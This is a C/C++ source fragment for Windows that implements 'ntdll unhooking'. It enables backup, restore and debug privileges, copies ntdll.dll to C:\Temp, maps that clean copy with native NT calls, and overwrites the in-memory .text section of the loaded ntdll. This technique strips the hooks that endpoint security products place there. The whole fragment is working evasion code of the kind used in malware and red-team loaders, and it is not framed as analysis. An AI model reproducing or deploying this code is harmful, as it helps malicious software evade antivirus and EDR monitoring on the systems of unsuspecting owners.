BOOL EnableBackupAndRestorePrivileges() { return EnablePrivilege(SE_BACKUP_NAME) && EnablePrivilege(SE_RESTORE_NAME); } //--------------------------------------------------------------------- // Ensure a local copy of ntdll.dll exists at C:\Temp\ntdll_copy.dll. BOOL EnsureLocalNtdllCopy() { EnableBackupAndRestorePrivileges(); LPCWSTR src = L"C:\\Windows\\System32\\ntdll.dll"; LPCWSTR dst = L"C:\\Temp\\ntdll_copy.dll"; CreateDirectoryW(L"C:\\Temp", nullptr); if (PathFileExistsW(dst)) { wprintf(L"[*] Local copy exists: %s\n", dst); return TRUE; } wprintf(L"[*] Copying %s to %s\n", src, dst); if (!CopyFileW(src, dst, FALSE)) { wprintf(L"[-] CopyFileW failed. Error=0x%X\n", GetLastError()); return FALSE; } wprintf(L"[+] Local copy created: %s\n", dst); return TRUE; } //--------------------------------------------------------------------- // Unhook ntdll.dll by mapping a clean copy and replacing the .text section. void UnhookNtdll() { wprintf(L"[*] UnhookNtdll entered.\n"); EnablePrivilege(SE_DEBUG_NAME); if (!EnsureLocalNtdllCopy()) { wprintf(L"[-] Local ntdll copy unavailable.\n"); return; } HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); if (!hNtdll) { wprintf(L"[-] GetModuleHandleW(ntdll.dll) failed.\n"); return; } auto NtOpenFile = (NtOpenFileFunc)GetProcAddress(hNtdll, "NtOpenFile"); auto NtCreateSection = (NtCreateSectionFunc)GetProcAddress(hNtdll, "NtCreateSection"); auto NtMapViewOfSection = (NtMapViewOfSectionFunc)GetProcAddress(hNtdll, "NtMapViewOfSection"); auto NtProtectVM = (NtProtectVirtualMemoryFunc)GetProcAddress(hNtdll, "NtProtectVirtualMemory"); auto NtUnmapView = (NtUnmapViewOfSectionFunc)GetProcAddress(hNtdll, "NtUnmapViewOfSection"); if (!NtOpenFile || !NtCreateSection || !NtMapViewOfSection || !NtProtectVM || !NtUnmapView) { wprintf(L"[-] Failed to resolve required NT functions.\n"); return; } WCHAR localPath[MAX_PATH] = L"\\??\\C:\\Temp\\ntdll_copy.dll"; localPath[MAX_PATH - 1] = L'\0'; UNICODE_STRING uStr; RtlInitUnicodeString(&uStr, localPath); OBJECT_ATTRIBUTES objAttr; InitializeObjectAttributes(&objAttr, &uStr, OBJ_CASE_INSENSITIVE, nullptr, nullptr); IO_STATUS_BLOCK iosb; HANDLE fileHandle = INVALID_HANDLE_VALUE; if (!NT_SUCCESS(NtOpenFile(&fileHandle, FILE_GENERIC_READ, &objAttr, &iosb, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE))) { wprintf(L"[-] NtOpenFile failed.\n"); return; } HANDLE sectionHandle = nullptr; LARGE_INTEGER maxSize = { 0 }; if (!NT_SUCCESS(NtCreateSection(§ionHandle, SECTION_MAP_READ, nullptr, &maxSize, PAGE_READONLY, SEC_IMAGE, fileHandle))) { wprintf(L"[-] NtCreateSection failed.\n"); NtClose(fileHandle); return; } PVOID mappingAddr = nullptr; SIZE_T viewSize = 0; if (!NT_SUCCESS(NtMapViewOfSection(sectionHandle, GetCurrentProcess(), &mappingAddr, 0, 0, nullptr, &viewSize, ViewUnmap, 0, PAGE_READONLY))) { wprintf(L"[-] NtMapViewOfSection failed.\n"); NtClose(sectionHandle); NtClose(fileHandle); return; } MODULEINFO mi = { 0 }; if (!GetModuleInformation(GetCurrentProcess(), hNtdll, &mi, sizeof(mi))) { wprintf(L"[-] GetModuleInformation failed.\n"); NtUnmapView(GetCurrentProcess(), mappingAddr); NtClose(sectionHandle); NtClose(fileHandle); return; } LPVOID realBase = mi.lpBaseOfDll; PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)realBase; PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)((BYTE*)realBase + dos->e_lfanew); PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntHdr); for (WORD i = 0; i < ntHdr->FileHeader.NumberOfSections; i++, section++) { if (!strcmp((char*)section->Name, ".text")) { PVOID textBase = (PVOID)((BYTE*)realBase + section->VirtualAddress); SIZE_T textSize = section->Misc.VirtualSize; ULONG oldProtect = 0; if (NT_SUCCESS(NtProtectVM(GetCurrentProcess(), &textBase, &textSize, PAGE_EXECUTE_READWRITE, &oldProtect))) { memcpy(textBase, (BYTE*)mappingAddr + section->VirtualAddress, section->Misc.VirtualSize); NtProtectVM(GetCurrentProcess(), &textBase, &textSize, oldProtect, &oldProtect); wprintf(L"[+] Unhooked .text section.\n"); } break; } } NtUnmapView(GetCurrentProcess(), mappingAddr); NtClose(sectionHandle); NtClose(fileHandle); wprintf(L"[+] ntdll.dll unhooked successfully.\n"); }